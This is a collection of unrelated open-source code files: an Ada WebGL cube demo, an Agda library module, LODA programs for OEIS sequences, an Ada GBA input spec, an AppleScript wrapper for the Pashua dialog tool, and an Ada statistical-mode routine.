(1, 3) := C * M (1, 3) + S * M (3, 3); -- m[8] = c*m[8]+s*m[10]; M (3, 1) := C * M (3, 1) - S * M11; -- m[2] = c*m[2]-s*mv0; M (3, 2) := C * M (3, 2) - S * M12; -- m[6] = c*m[6]-s*mv4; M (3, 3) := C * M (3, 3) - S * M13; -- m[10] = c*m[10]-s*mv8; end Rotate_Y; -------------- -- Rotate_Z -- -------------- procedure Rotate_Z (M : in out OpenGL.GLfloat_Matrix_4x4; Angle : OpenGL.GLfloat) is -- 0 4 8 12 -- 1 5 9 13 -- 2 6 10 14 -- 3 7 11 15 C : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Cos (Angle); S : constant OpenGL.GLfloat := GLfloat_Elementary_Functions.Sin (Angle); M11 : constant OpenGL.GLfloat := M (1, 1); M12 : constant OpenGL.GLfloat := M (1, 2); M13 : constant OpenGL.GLfloat := M (1, 3); -- var mv0 = m[0], mv4 = m[4], mv8 = m[8]; begin M (1, 1) := C * M (1, 1) - S * M (2, 1); -- m[0] = c*m[0]-s*m[1]; M (1, 2) := C * M (1, 2) - S * M (2, 2); -- m[4] = c*m[4]-s*m[5]; M (1, 3) := C * M (1, 3) - S * M (2, 3); -- m[8] = c*m[8]-s*m[9]; M (2, 1) := C * M (2, 1) + S * M11; -- m[1]=c*m[1]+s*mv0; M (2, 2) := C * M (2, 2) + S * M12; -- m[5]=c*m[5]+s*mv4; M (2, 3) := C * M (2, 3) + S * M13; -- m[9]=c*m[9]+s*mv8; end Rotate_Z; Projection_Matrix : OpenGL.GLfloat_Matrix_4x4; Model_View_Matrix : constant OpenGL.GLfloat_Matrix_4x4 := ((1.0, 0.0, 0.0, 0.0), (0.0, 1.0, 0.0, 0.0), (0.0, 0.0, 1.0, -6.0), (0.0, 0.0, 0.0, 1.0)); Model_Move_Matrix : OpenGL.GLfloat_Matrix_4x4 := ((1.0, 0.0, 0.0, 0.0), (0.0, 1.0, 0.0, 0.0), (0.0, 0.0, 1.0, 0.0), (0.0, 0.0, 0.0, 1.0)); W : My_GL_Widget_Access; -- T : OpenGL.GLfloat := 0.0; -- ----------------- -- -- Click_Event -- -- ----------------- -- -- overriding procedure Click_Event -- (Self : in out My_GL_Widget; -- Event : in out Web.UI.Events.Mouse.Click.Click_Event'Class) -- is -- begin -- System.IO.Put_Line ("Clicked!"); -- end Click_Event; ------------------ -- Context_Lost -- ------------------ overriding procedure Context_Lost (Self : in out My_GL_Widget) is begin raise Program_Error; end Context_Lost; ---------------- -- Initialize -- ---------------- procedure Initialize (Self : in out My_GL_Widget'Class) is Canvas : Web.HTML.Canvases.HTML_Canvas_Element := Web.Window.Document.Get_Element_By_Id (+"cube_gl_canvas").As_HTML_Canvas; begin Web.UI.GL_Widgets.Constructors.Initialize (Self, Canvas); end Initialize; --------------------- -- Initialize_Demo -- --------------------- procedure Initialize_Demo is begin W := new My_GL_Widget; Initialize (W.all); end Initialize_Demo; ------------------- -- Initialize_GL -- ------------------- overriding procedure Initialize_GL (Self : in out My_GL_Widget) is begin Self.Vertex_Buffer.Create; Self.Vertex_Buffer.Bind; Self.Vertex_Buffer.Allocate (Points); Self.Index_Buffer.Create; Self.Index_Buffer.Bind; Self.Index_Buffer.Allocate (Indicies); Self.Program.Initialize; end Initialize_GL; -------------- -- Paint_GL -- -------------- overriding procedure Paint_GL (Self : in out My_GL_Widget) is use type OpenGL.GLbitfield; DT : OpenGL.GLfloat := 1.0 / 60.0 * 1_000.0; begin Rotate_Z (Model_Move_Matrix, DT * 0.005); Rotate_Y (Model_Move_Matrix, DT * 0.002); Rotate_X (Model_Move_Matrix, DT * 0.003); Self.Program.Bind; Self.Program.Set_Projection_Matrix (Projection_Matrix); Self.Program.Set_Model_View_Matrix (Model_View_Matrix); Self.Program.Set_Model_Move_Matrix (Model_Move_Matrix); Self.Program.Set_Vertex_Data_Buffer (Self.Vertex_Buffer); Self.Functions.Enable (OpenGL.GL_DEPTH_TEST); Self.Functions.Depth_Func (OpenGL.GL_LEQUAL); Self.Functions.Clear_Color (0.5, 0.5, 0.5, 0.9); Self.Functions.Clear_Depth (1.0); Self.Functions.Clear (OpenGL.GL_COLOR_BUFFER_BIT + OpenGL.GL_DEPTH_BUFFER_BIT); Self.Vertex_Buffer.Bind; Self.Index_Buffer.Bind; Self.Functions.Draw_Elements (OpenGL.GL_TRIANGLES, Indicies'Length, OpenGL.GL_UNSIGNED_SHORT, 0); Self.Update; end Paint_GL; --------------- -- Resize_GL -- --------------- overriding procedure Resize_GL (Self : in out My_GL_Widget; Width : Integer; Height : Integer) is begin Projection_Matrix := Projection (40.0, OpenGL.GLfloat (Width) / OpenGL.GLfloat (Height), 1.0, 100.0); end Resize_GL; begin Initialize_Demo; end Cube_Demo;
agda-stdlib/src/Relation/Nullary/Implication.agda
DreamLinuxer/popl21-artifact
5
3284
<reponame>DreamLinuxer/popl21-artifact ------------------------------------------------------------------------ -- The Agda standard library -- -- Implications of nullary relations ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Relation.Nullary.Implication where open import Data.Bool.Base open import Data.Empty open import Function.Base open import Relation.Nullary open import Level private variable p q : Level P : Set p Q : Set q ------------------------------------------------------------------------ -- Some properties which are preserved by _→_. infixr 2 _→-reflects_ _→-dec_ _→-reflects_ : ∀ {bp bq} → Reflects P bp → Reflects Q bq → Reflects (P → Q) (not bp ∨ bq) ofʸ p →-reflects ofʸ q = ofʸ (const q) ofʸ p →-reflects ofⁿ ¬q = ofⁿ (¬q ∘ (_$ p)) ofⁿ ¬p →-reflects _ = ofʸ (⊥-elim ∘ ¬p) _→-dec_ : Dec P → Dec Q → Dec (P → Q) does (p? →-dec q?) = not (does p?) ∨ does q? proof (p? →-dec q?) = proof p? →-reflects proof q?
programs/oeis/211/A211440.asm
karttu/loda
0
93064
; A211440: Number of ordered triples (w,x,y) with all terms in {-n,...,0,...,n} and 2w+3x+3y=0. ; 1,3,5,17,23,29,53,63,73,109,123,137,185,203,221,281,303,325,397,423,449,533,563,593,689,723,757,865,903,941,1061,1103,1145,1277,1323,1369,1513,1563,1613,1769,1823,1877,2045,2103,2161,2341,2403,2465,2657,2723,2789,2993,3063,3133,3349,3423,3497,3725,3803,3881,4121,4203,4285,4537,4623,4709,4973,5063,5153,5429,5523,5617,5905,6003,6101,6401,6503,6605,6917,7023,7129,7453,7563,7673,8009,8123,8237,8585,8703,8821,9181,9303,9425,9797,9923,10049,10433,10563,10693,11089,11223,11357,11765,11903,12041,12461,12603,12745,13177,13323,13469,13913,14063,14213,14669,14823,14977,15445,15603,15761,16241,16403,16565,17057,17223,17389,17893,18063,18233,18749,18923,19097,19625,19803,19981,20521,20703,20885,21437,21623,21809,22373,22563,22753,23329,23523,23717,24305,24503,24701,25301,25503,25705,26317,26523,26729,27353,27563,27773,28409,28623,28837,29485,29703,29921,30581,30803,31025,31697,31923,32149,32833,33063,33293,33989,34223,34457,35165,35403,35641,36361,36603,36845,37577,37823,38069,38813,39063,39313,40069,40323,40577,41345,41603,41861,42641,42903,43165,43957,44223,44489,45293,45563,45833,46649,46923,47197,48025,48303,48581,49421,49703,49985,50837,51123,51409,52273,52563,52853,53729,54023,54317,55205,55503,55801,56701,57003,57305,58217,58523,58829,59753,60063,60373,61309,61623,61937,62885,63203,63521,64481,64803,65125,66097,66423,66749,67733,68063,68393,69389 mov $4,$0 mov $5,$0 add $0,1 add $0,$4 mul $0,2 mov $2,$0 lpb $0,1 sub $0,7 trn $0,5 mov $1,$3 sub $2,4 add $3,$2 lpe add $1,6 lpb $5,1 add $1,2 sub $5,1 lpe sub $1,5
src/GBA.Input.Unbuffered.ads
98devin/ada-gba-dev
7
19991
-- Copyright (c) 2021 <NAME> -- zlib License -- see LICENSE for details. with GBA.Input; use GBA.Input; package GBA.Input.Unbuffered is function Is_Key_Down(K : Key) return Boolean with Inline_Always; function Are_Any_Down(F : Key_Flags) return Boolean with Inline_Always; function Are_All_Down(F : Key_Flags) return Boolean with Inline_Always; end GBA.Input.Unbuffered;
source/ASPashua.applescript
doekman/Pashua-Binding-AppleScript-Library
1
35
<filename>source/ASPashua.applescript use AppleScript version "2.4" use scripting additions use framework "Foundation" global pashua_binary global log_to_file --| custom pashua location on «event PASHCMPL» new_path global pashua_path tell application "Finder" if not (new_path exists) then error "New path to Pashua.app does not exist" number 1003 end if end tell init_library_stuff() set pashua_binary to (POSIX path of new_path) & "Contents/MacOS/Pashua" end «event PASHCMPL» --| display pashua dialog on «event PASHDIDI» config -- Get path to Pashua binary set pashua_binary to get_pashua_path() -- Call with either text or alias if class of config is text then set pashua_cmd to "echo " & quoted form of config & " | " & quoted form of pashua_binary & " -" else if class of config is alias then set pashua_cmd to quoted form of pashua_binary & space & quoted form of POSIX path of config else error "Call this method with either 'text' of 'alias', not with '" & (class of config) & "'" number 1000 end if -- Call pashua set pashua_res to do_shell_with_log("display pashua dialog", pashua_cmd) set result_lines to split_string(pashua_res, return) -- There was an error in the config if (count of result_lines) is 0 then error "It looks like Pashua.app had some problems using the window configuration." number 1001 -- User pressed cancel if (count of result_lines) is 1 then error number -128 --user canceled -- Everything went fine set record_result to ini_to_record(result_lines) return record_result end «event PASHDIDI» --| display multi dialog on «event PASHDIMD» introductionText given «class Qsnl»:questionLabels : missing value, «class Dfta»:defaultAnswers : missing value, «class Eltt»:elementTypes : missing value, «class Wttl»:titleText : missing value set configLines to {} if titleText is not missing value then set configLines to configLines & {"*.title = " & titleText} if introductionText is not missing value and introductionText ≠ "" then set configLines to configLines & {"intro.type = text", "intro.text = " & replace_text(linefeed, "[return]", introductionText)} if questionLabels is not missing value or defaultAnswers is not missing value or elementTypes is not missing value then # we need to create some input fields if elementTypes is missing value then if defaultAnswers is missing value then set elementTypes to inferElementTypes(questionLabels) else set elementTypes to inferElementTypes(defaultAnswers) end if end if appendFieldsToConfig(configLines, questionLabels, defaultAnswers, elementTypes) end if set config to join_list(configLines, linefeed) display dialog "This is the generated config" default answer config return «event PASHDIDI» config end «event PASHDIMD» on appendFieldsToConfig(configLines, questionLabels, defaultAnswers, elementTypes) set codeToType to {EChk:"checkbox", EDte:"date", ETme:"date", EDtm:"date", EPwd:"password", MPwd:"password", ETbx:"textbox", MTbx:"textbox", ETfd:"textfield", MTfd:"textfield"} set the codeToTypeDict to current application's NSDictionary's dictionaryWithDictionary:codeToType repeat with i from 1 to count of elementTypes set fieldName to "field" & i set elementType to item i of elementTypes set elementCode to text 8 thru 11 of (elementType as text) #«class xxxx» set elementValue to (codeToTypeDict's valueForKey:elementCode) set pashuaType to elementValue as text copy (fieldName & ".type = " & pashuaType) to the end of configLines if elementCode starts with "M " then copy (fieldName & ".mandatory = 1") to the end of configLines end if if pashuaType is "date" then copy (fieldName & ".textual = 1") to the end of configLines if elementCode is "EDtm" then --datetime copy (fieldName & ".time = 1") to the end of configLines end if if elementCode is "ETme" then --time copy (fieldName & ".date = 0") to the end of configLines copy (fieldName & ".time = 1") to the end of configLines end if end if if questionLabels is not missing value then set questionLabel to item i of questionLabels copy (fieldName & ".label = " & questionLabel) to the end of configLines else if pashuaType is "checkbox" then copy (fieldName & ".label = " & fieldName) to the end of configLines end if if defaultAnswers is not missing value then set defaultAnswer to item i of defaultAnswers --TODO: convert to text in right format copy (fieldName & ".default = " & defaultAnswer) to the end of configLines end if end repeat end appendFieldsToConfig on inferElementTypes(fieldValues as list) set inferedElementTypes to {} repeat with fieldValue in fieldValues if class of fieldValue is boolean then copy «class EChk» to the end of inferedElementTypes #checkbox else if class of fieldValue is date then if time of fieldValue is 0 then copy «class EDte» to the end of inferedElementTypes #date else copy «class EDtm» to the end of inferedElementTypes #datetime end if else copy «class ETfd» to the end of inferedElementTypes #textfield end if end repeat return inferedElementTypes end inferElementTypes -- Private handlers --------------------------------------------------------------------- --| Parses Pashua's output to a AppleScript record on ini_to_record(ini_lines as list) local result_dictionary, pos, key_string, value_string set number_of_lines to count of ini_lines set result_dictionary to current application's NSMutableDictionary's dictionaryWithCapacity:number_of_lines repeat with text_line in ini_lines set pos to offset of "=" in text_line set key_string to text 1 thru (pos - 1) of text_line if (count of text_line) ≤ pos then set value_string to "" --use empty string, because missing value won't show up in record else set value_string to text (pos + 1) thru (length of text_line) of text_line end if (result_dictionary's setValue:value_string forKey:key_string) end repeat return result_dictionary as record end ini_to_record on get_pashua_path() global pashua_binary try return pashua_binary on error number -2753 --The variable <pashua_path> is not defined; first: init_library_stuff() -- now look for a reference to the Pashua binary try set app_location to path to resource "Pashua.app" in directory "bin" as text return (POSIX path of app_location) & "Contents/MacOS/Pashua" on error number -192 --A resource wasn’t found. repeat with pashua_location in [path to applications folder from user domain, path to applications folder from local domain] set app_location to (pashua_location as text) & "Pashua.app:" tell application "Finder" if alias app_location exists then set pashua_binary to (my POSIX path of alias app_location) & "Contents/MacOS/Pashua" return pashua_binary end if end tell end repeat end try error "Can't locate the path of Pashua.app. Download it from http://www.bluem.net/files/Pashua.dmg and save it in the 'Applications' folder." number 1002 end try end get_pashua_path --| Utilities to join_list(aList as list, delimiter as text) local sourceList, res set the sourceList to current application's NSArray's arrayWithArray:aList set res to sourceList's componentsJoinedByString:delimiter return res as text end join_list to split_string(aString as text, delimiter as text) local sourceString, res if aString is "" then return {} --special case set the sourceList to current application's NSString's stringWithString:aString set res to sourceList's componentsSeparatedByString:delimiter return res as list end split_string on replace_text(searchString as text, replacementString as text, sourceText) local sourceString, adjustedString if sourceText is missing value then return sourceText end if set the sourceString to current application's NSString's stringWithString:sourceText set the adjustedString to the sourceString's stringByReplacingOccurrencesOfString:searchString withString:replacementString return adjustedString as text end replace_text --| Executes a shell command, and logs before and after on do_shell_with_log(title, command) do_log(title & " COMMAND [" & command & "]") set shell_result to do shell script command do_log(title & " RESULT [" & command & "]") return shell_result end do_shell_with_log --| Log a line of text to ~/Library/Logs/AppleScript/ASPashua.log on do_log(log_message) if log_to_file then set log_sh to path to resource "log.sh" in directory "bin" set log_name to "ASPashua" --name of logfile --set log_message to replaceText(return, linefeed, log_message) set cmd to (quoted form of the POSIX path of log_sh) & space & (quoted form of log_name) & space & (quoted form of log_message) do shell script cmd end if end do_log on init_library_stuff() try set log_to_file to (do shell script "defaults read com.zanstra.ASPashua do_log") is "1" on error number 1 set log_to_file to false end try end init_library_stuff
oeis/010/A010683.asm
neoneye/loda-programs
11
173518
; A010683: Let S(x,y) = number of lattice paths from (0,0) to (x,y) that use the step set { (0,1), (1,0), (2,0), (3,0), ....} and never pass below y = x. Sequence gives S(n-1,n) = number of 'Schröder' trees with n+1 leaves and root of degree 2. ; Submitted by <NAME> ; 1,2,7,28,121,550,2591,12536,61921,310954,1582791,8147796,42344121,221866446,1170747519,6216189936,33186295681,178034219986,959260792775,5188835909516,28167068630713,153395382655222,837838806587167,4588597749951208,25192852559461601,138634022615202170,764511259708118791,4224291250014620356,23384109482272744569,129667703608901874078,720176447965447553535,4005887155865019760608,22313707738002591022593,124457768286179427645858,695050890700934586550407,3886201816241682105678588 mov $1,2 mov $3,$0 add $0,2 mov $4,2 lpb $3 add $0,1 add $2,$1 sub $3,1 mul $1,$3 mul $1,$0 add $5,$4 div $1,$5 add $2,$1 add $4,2 lpe mov $0,$2 div $0,2 add $0,1
Task/Averages-Mode/Ada/averages-mode-2.ada
LaudateCorpus1/RosettaCodeData
1
30148
with Ada.Containers.Indefinite_Vectors; package body Mode is -- map Count to Elements package Count_Vectors is new Ada.Containers.Indefinite_Vectors (Element_Type => Element_Array, Index_Type => Positive); procedure Add (To : in out Count_Vectors.Vector; Item : Element_Type) is use type Count_Vectors.Cursor; Position : Count_Vectors.Cursor := To.First; Found : Boolean := False; begin while not Found and then Position /= Count_Vectors.No_Element loop declare Elements : Element_Array := Count_Vectors.Element (Position); begin for I in Elements'Range loop if Elements (I) = Item then Found := True; end if; end loop; end; if not Found then Position := Count_Vectors.Next (Position); end if; end loop; if Position /= Count_Vectors.No_Element then -- element found, remove it and insert to next count declare New_Position : Count_Vectors.Cursor := Count_Vectors.Next (Position); begin -- remove from old position declare Old_Elements : Element_Array := Count_Vectors.Element (Position); New_Elements : Element_Array (1 .. Old_Elements'Length - 1); New_Index : Positive := New_Elements'First; begin for I in Old_Elements'Range loop if Old_Elements (I) /= Item then New_Elements (New_Index) := Old_Elements (I); New_Index := New_Index + 1; end if; end loop; To.Replace_Element (Position, New_Elements); end; -- new position not already there? if New_Position = Count_Vectors.No_Element then declare New_Array : Element_Array (1 .. 1) := (1 => Item); begin To.Append (New_Array); end; else -- add to new position declare Old_Elements : Element_Array := Count_Vectors.Element (New_Position); New_Elements : Element_Array (1 .. Old_Elements'Length + 1); begin New_Elements (1 .. Old_Elements'Length) := Old_Elements; New_Elements (New_Elements'Last) := Item; To.Replace_Element (New_Position, New_Elements); end; end if; end; else -- element not found, add to count 1 Position := To.First; if Position = Count_Vectors.No_Element then declare New_Array : Element_Array (1 .. 1) := (1 => Item); begin To.Append (New_Array); end; else declare Old_Elements : Element_Array := Count_Vectors.Element (Position); New_Elements : Element_Array (1 .. Old_Elements'Length + 1); begin New_Elements (1 .. Old_Elements'Length) := Old_Elements; New_Elements (New_Elements'Last) := Item; To.Replace_Element (Position, New_Elements); end; end if; end if; end Add; function Get_Mode (Set : Element_Array) return Element_Array is Counts : Count_Vectors.Vector; begin for I in Set'Range loop Add (Counts, Set (I)); end loop; return Counts.Last_Element; end Get_Mode; end Mode;